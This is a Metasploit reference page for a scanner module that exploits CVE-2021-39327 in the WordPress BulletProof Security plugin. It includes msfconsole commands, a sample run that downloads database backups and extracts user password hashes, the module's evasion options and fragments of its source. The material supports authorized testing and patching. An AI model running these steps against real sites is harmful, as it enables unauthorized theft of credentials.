Wordpress BulletProof Security Backup Disclosure - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/wp_bulletproofsecurity_backups metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Wordpress BulletProof Security Backup Disclosure
Module: auxiliary/scanner/http/wp_bulletproofsecurity_backups
Source code: modules/auxiliary/scanner/http/wp_bulletproofsecurity_backups.rb
Disclosure date: 2021-09-17
Last modification time: 2021-10-12 18:43:41 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-39327

The Wordpress plugin BulletProof Security, versions <= 5.1, suffers from an information disclosure vulnerability, in that the db_backup_log.txt is publicly accessible. If the backup functionality is being utilized, this file will disclose where the backup files can be downloaded. After downloading the backup file, it will be parsed to grab all user credentials.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/wp_bulletproofsecurity_backups
msf auxiliary(wp_bulletproofsecurity_backups) > show options
    ... show and set options ...
msf auxiliary(wp_bulletproofsecurity_backups) > set RHOSTS ip-range
msf auxiliary(wp_bulletproofsecurity_backups) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(wp_bulletproofsecurity_backups) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(wp_bulletproofsecurity_backups) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(wp_bulletproofsecurity_backups) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


The Wordpress plugin BulletProof Security, versions <= 5.1, suffers from an information disclosure vulnerability, in that the db_backup_log.txt is publicly accessible. If the backup functionality is being utilized, this file will disclose where the backup files can be downloaded. After downloading the backup file, it will be parsed to grab all user credentials.

Download it from here

Verification Steps


  1. Install the plugin, create a backup job, and manually run it.
  2. Start msfconsole
  3. Do: use auxiliary/scanner/http/wp_bulletproofsecurity_backups
  4. Do: set rhosts [ip]
  5. Do: run
  6. You should find database backup log files.

Scenarios


Wordpress 5.4.4 with BulletProof Security 5.1

[*] Using auxiliary/scanner/http/wp_bulletproofsecurity_backups
resource (bulletproof.rb)> set rhosts 111.111.1.111
rhosts => 111.111.1.111
resource (bulletproof.rb)> set verbose true
verbose => true
resource (bulletproof.rb)> run
[*] Checking if target is online and running Wordpress...
[*] Checking plugin installed and vulnerable
[*] Checking /wp-content/plugins/bulletproof-security/readme.txt
[*] Found version 5.1 in the plugin
[*] Requesting Backup files
[+] Stored db_backup_log.txt to /home/h00die/.msf4/loot/20211012183149_default_111.111.1.111_db_backup_log.tx_935521.txt, size: 12106
[*] Pulling: /wp-content/bps-backup/backups_bd4aBHlhN9ODGQq/2021-10-11-time-8-35-42-pm.zip
[+] Stored DB Backup 2021-10-11-time-8-35-42-pm.zip to /home/h00die/.msf4/loot/20211012183149_default_111.111.1.111_20211011time_891612.zip, size: 354673
[*] Found user line: VALUES ( 1, 'admin', '$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0', 'admin', '[email protected]', 'http://111.111.1.111', '2020-05-30 12:39:48', '1608323285:$P$B9FDhsfhTLZfvAKt8dbgOrs5CoHDUr/', 0, 'admin' );
[+]   Extracted user content: admin -> $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
[*] Found user line: VALUES ( 2, 'editor', '$P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/', 'editor', '[email protected]', '', '2020-10-27 23:49:32', '1607478044:$P$BZ1kwDNNxe5QJ6ibiU4yPIBC8X5Mhv.', 0, 'editor' );
[+]   Extracted user content: editor -> $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
[*] Found user line: VALUES ( 3, 'admin2', '$P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1', 'admin2', '[email protected]', '', '2020-10-27 23:49:57', '', 0, 'admin2' );
[+]   Extracted user content: admin2 -> $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
[*] Found user line: VALUES ( 4, 'user', '$P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0', 'user', '[email protected]', '', '2021-08-22 13:58:04', '', 0, 'user user' );
[+]   Extracted user content: user -> $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0
[*] Pulling: /wp-content/bps-backup/backups_bd4aBHlhN9ODGQq/2021-10-11-time-8-35-42-pm.zip
[+] Stored DB Backup 2021-10-11-time-8-35-42-pm.zip to /home/h00die/.msf4/loot/20211012183150_default_111.111.1.111_20211011time_324844.zip, size: 354673
[*] Found user line: VALUES ( 1, 'admin', '$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0', 'admin', '[email protected]', 'http://111.111.1.111', '2020-05-30 12:39:48', '1608323285:$P$B9FDhsfhTLZfvAKt8dbgOrs5CoHDUr/', 0, 'admin' );
[+]   Extracted user content: admin -> $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
[*] Found user line: VALUES ( 2, 'editor', '$P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/', 'editor', '[email protected]', '', '2020-10-27 23:49:32', '1607478044:$P$BZ1kwDNNxe5QJ6ibiU4yPIBC8X5Mhv.', 0, 'editor' );
[+]   Extracted user content: editor -> $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
[*] Found user line: VALUES ( 3, 'admin2', '$P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1', 'admin2', '[email protected]', '', '2020-10-27 23:49:57', '', 0, 'admin2' );
[+]   Extracted user content: admin2 -> $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
[*] Found user line: VALUES ( 4, 'user', '$P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0', 'user', '[email protected]', '', '2021-08-22 13:58:04', '', 0, 'user user' );
[+]   Extracted user content: user -> $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0
[*] Pulling: /wp-content/bps-backup/backups_bd4aBHlhN9ODGQq/2021-10-11-time-8-35-42-pm.zip
[+] Stored DB Backup 2021-10-11-time-8-35-42-pm.zip to /home/h00die/.msf4/loot/20211012183150_default_111.111.1.111_20211011time_664814.zip, size: 354673
[*] Found user line: VALUES ( 1, 'admin', '$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0', 'admin', '[email protected]', 'http://111.111.1.111', '2020-05-30 12:39:48', '1608323285:$P$B9FDhsfhTLZfvAKt8dbgOrs5CoHDUr/', 0, 'admin' );
[+]   Extracted user content: admin -> $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
[*] Found user line: VALUES ( 2, 'editor', '$P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/', 'editor', '[email protected]', '', '2020-10-27 23:49:32', '1607478044:$P$BZ1kwDNNxe5QJ6ibiU4yPIBC8X5Mhv.', 0, 'editor' );
[+]   Extracted user content: editor -> $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
[*] Found user line: VALUES ( 3, 'admin2', '$P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1', 'admin2', '[email protected]', '', '2020-10-27 23:49:57', '', 0, 'admin2' );
[+]   Extracted user content: admin2 -> $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
[*] Found user line: VALUES ( 4, 'user', '$P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0', 'user', '[email protected]', '', '2021-08-22 13:58:04', '', 0, 'user user' );
[+]   Extracted user content: user -> $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0
[-] /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt not found on server or no data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_bulletproofsecurity_backups) > creds
Credentials
===========

host           origin         service             public  private                             realm  private_type        JtR Format
----           ------         -------             ------  -------                             -----  ------------        ----------
111.111.1.111  111.111.1.111  80/tcp (Wordpress)  admin   $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0         Nonreplayable hash  phpass
111.111.1.111  111.111.1.111  80/tcp (Wordpress)  editor  $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/         Nonreplayable hash  phpass
111.111.1.111  111.111.1.111  80/tcp (Wordpress)  admin2  $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1         Nonreplayable hash  phpass
111.111.1.111  111.111.1.111  80/tcp (Wordpress)  user    $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0         Nonreplayable hash  phpass

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/wp_bulletproofsecurity_backups auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/wp_bulletproofsecurity_backups

msf6 auxiliary(scanner/http/wp_bulletproofsecurity_backups) > show info

       Name: Wordpress BulletProof Security Backup Disclosure
     Module: auxiliary/scanner/http/wp_bulletproofsecurity_backups
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2021-09-17

Provided by:
  Ron Jost (Hacker5preme)
  h00die

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  The Wordpress plugin BulletProof Security, versions <= 5.1, suffers 
  from an information disclosure vulnerability, in that the 
  db_backup_log.txt is publicly accessible. If the backup 
  functionality is being utilized, this file will disclose where the 
  backup files can be downloaded. After downloading the backup file, 
  it will be parsed to grab all user credentials.

References:
  https://www.exploit-db.com/exploits/50382
  https://nvd.nist.gov/vuln/detail/CVE-2021-39327
  https://packetstormsecurity.com/files/164420
  https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md

Module Options


This is a complete list of options available in the scanner/http/wp_bulletproofsecurity_backups auxiliary module:

msf6 auxiliary(scanner/http/wp_bulletproofsecurity_backups) > show options

Module options (auxiliary/scanner/http/wp_bulletproofsecurity_backups):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/wp_bulletproofsecurity_backups auxiliary module:

msf6 auxiliary(scanner/http/wp_bulletproofsecurity_backups) > show advanced

Module advanced options (auxiliary/scanner/http/wp_bulletproofsecurity_backups):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto
                                                                                       , TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module
   WPCHECK               true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR          wp-content                                          yes       The name of the wp-content directory

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/wp_bulletproofsecurity_backups module can do:

msf6 auxiliary(scanner/http/wp_bulletproofsecurity_backups) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/wp_bulletproofsecurity_backups auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/wp_bulletproofsecurity_backups) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The target is not online and running Wordpress


Here is a relevant code snippet related to the "The target is not online and running Wordpress" error message:

133:	    end
134:	  end
135:	
136:	  def run_host(ip)
137:	    vprint_status('Checking if target is online and running Wordpress...')
138:	    fail_with(Failure::BadConfig, 'The target is not online and running Wordpress') unless wordpress_and_online?
139:	    vprint_status('Checking plugin installed and vulnerable')
140:	    checkcode = check_plugin_version_from_readme('bulletproof-security', '5.2')
141:	    fail_with(Failure::BadConfig, 'The target is not running a vulnerable bulletproof-security version') if checkcode == Exploit::CheckCode::Safe
142:	    print_status('Requesting Backup files')
143:	    ['/wp-content/bps-backup/logs/db_backup_log.txt', '/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt'].each do |url|

The target is not running a vulnerable bulletproof-security version


Here is a relevant code snippet related to the "The target is not running a vulnerable bulletproof-security version" error message:

136:	  def run_host(ip)
137:	    vprint_status('Checking if target is online and running Wordpress...')
138:	    fail_with(Failure::BadConfig, 'The target is not online and running Wordpress') unless wordpress_and_online?
139:	    vprint_status('Checking plugin installed and vulnerable')
140:	    checkcode = check_plugin_version_from_readme('bulletproof-security', '5.2')
141:	    fail_with(Failure::BadConfig, 'The target is not running a vulnerable bulletproof-security version') if checkcode == Exploit::CheckCode::Safe
142:	    print_status('Requesting Backup files')
143:	    ['/wp-content/bps-backup/logs/db_backup_log.txt', '/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt'].each do |url|
144:	      res = send_request_cgi({
145:	        'uri' => normalize_uri(target_uri.path, url)
146:	      })

<URL> not found on server or no data


Here is a relevant code snippet related to the "<URL> not found on server or no data" error message:

148:	      # <65 in length will be just the banner, like:
149:	      # BPS DB BACKUP LOG
150:	      # ==================
151:	      # ==================
152:	      unless res && res.code == 200 && res.body.length > 65
153:	        print_error("#{url} not found on server or no data")
154:	        next
155:	      end
156:	      filename = url.split('/').last
157:	      p = store_loot(filename, 'text/plain', rhost, res.body, filename)
158:	      print_good("Stored #{filename} to #{p}, size: #{res.body.length}")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Ron Jost (Hacker5preme)
  • h00die

Version


This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.